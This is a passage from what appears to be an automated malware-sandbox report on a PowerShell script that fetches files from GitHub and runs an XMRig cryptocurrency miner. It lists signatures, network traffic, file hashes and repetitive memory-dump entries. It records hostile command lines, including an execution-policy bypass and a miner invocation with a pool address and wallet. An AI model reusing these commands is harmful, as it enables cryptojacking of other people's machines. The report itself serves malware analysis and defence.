| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4696 wrote to memory of 4468 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4696 wrote to memory of 4468 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp |
Files
memory/4696-0-0x00007FFD5B973000-0x00007FFD5B975000-memory.dmp
memory/4696-1-0x000002ACAC7C0000-0x000002ACAC7E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pp5ldoed.tlp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4696-11-0x00007FFD5B970000-0x00007FFD5C431000-memory.dmp
memory/4696-12-0x00007FFD5B970000-0x00007FFD5C431000-memory.dmp
memory/4696-14-0x00007FFD5B970000-0x00007FFD5C431000-memory.dmp
memory/4696-15-0x000002ACAED50000-0x000002ACAED62000-memory.dmp
memory/4696-16-0x000002ACAED30000-0x000002ACAED3A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4468-47-0x0000017569D50000-0x0000017569D70000-memory.dmp
memory/4468-48-0x00000175FDAC0000-0x00000175FDAE0000-memory.dmp
memory/4468-49-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-52-0x00000175FE150000-0x00000175FE170000-memory.dmp
memory/4468-51-0x00000175FE130000-0x00000175FE150000-memory.dmp
memory/4468-50-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4696-53-0x00007FFD5B973000-0x00007FFD5B975000-memory.dmp
memory/4696-54-0x00007FFD5B970000-0x00007FFD5C431000-memory.dmp
memory/4468-55-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-56-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-58-0x00000175FE150000-0x00000175FE170000-memory.dmp
memory/4468-57-0x00000175FE130000-0x00000175FE150000-memory.dmp
memory/4468-59-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-60-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-61-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-62-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-63-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-64-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-65-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-66-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-67-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-68-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-69-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-70-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-71-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-72-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-73-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-74-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-75-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-76-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-77-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-78-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-79-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-80-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-81-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-82-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-83-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-84-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-85-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-86-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-87-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-88-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-89-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-90-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-91-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-92-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-93-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-94-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-95-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-96-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-97-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-98-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-99-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-100-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-101-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-102-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-103-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-104-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-105-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-106-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-107-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-108-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-109-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-110-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-111-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-112-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-113-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-114-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-115-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-116-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-117-0x00007FF707D10000-0x00007FF708943000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:46
Platform
win10-20240404-en
Max time kernel
1795s
Max time network
1775s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3052 wrote to memory of 2708 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3052 wrote to memory of 2708 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.197.79.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
memory/3052-0-0x00007FFFCCAA3000-0x00007FFFCCAA4000-memory.dmp
memory/3052-5-0x000001FB6CE70000-0x000001FB6CE92000-memory.dmp
memory/3052-8-0x00007FFFCCAA0000-0x00007FFFCD48C000-memory.dmp
memory/3052-9-0x000001FB6CF20000-0x000001FB6CF96000-memory.dmp
memory/3052-10-0x00007FFFCCAA0000-0x00007FFFCD48C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3wf030tf.cs0.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3052-25-0x00007FFFCCAA0000-0x00007FFFCD48C000-memory.dmp
memory/3052-48-0x000001FB6D0C0000-0x000001FB6D0D2000-memory.dmp
memory/3052-61-0x000001FB6CF10000-0x000001FB6CF1A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2708-90-0x0000018469D10000-0x0000018469D30000-memory.dmp
memory/3052-91-0x00007FFFCCAA3000-0x00007FFFCCAA4000-memory.dmp
memory/2708-92-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/3052-93-0x00007FFFCCAA0000-0x00007FFFCD48C000-memory.dmp
memory/2708-94-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-95-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-96-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-97-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-98-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-99-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-100-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-101-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-102-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-103-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-104-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-105-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-106-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-107-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-108-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-109-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-110-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-111-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-112-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-113-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-114-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-115-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-116-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-117-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-118-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-119-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-120-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-121-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-122-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-123-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-124-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-125-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-126-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-127-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-128-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-129-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-130-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-131-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-132-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-133-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-134-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-135-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-136-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-137-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-138-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-139-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-140-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-141-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-142-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-143-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-144-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-145-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-146-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-147-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-148-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-149-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-150-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-151-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-152-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-153-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-154-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-155-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:46
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1784s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4700 wrote to memory of 624 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4700 wrote to memory of 624 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.71.105.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
Files
memory/4700-3-0x00007FFE454A3000-0x00007FFE454A4000-memory.dmp
memory/4700-5-0x000001F2F1FA0000-0x000001F2F1FC2000-memory.dmp
memory/4700-6-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
memory/4700-9-0x000001F2F21D0000-0x000001F2F2246000-memory.dmp
memory/4700-18-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
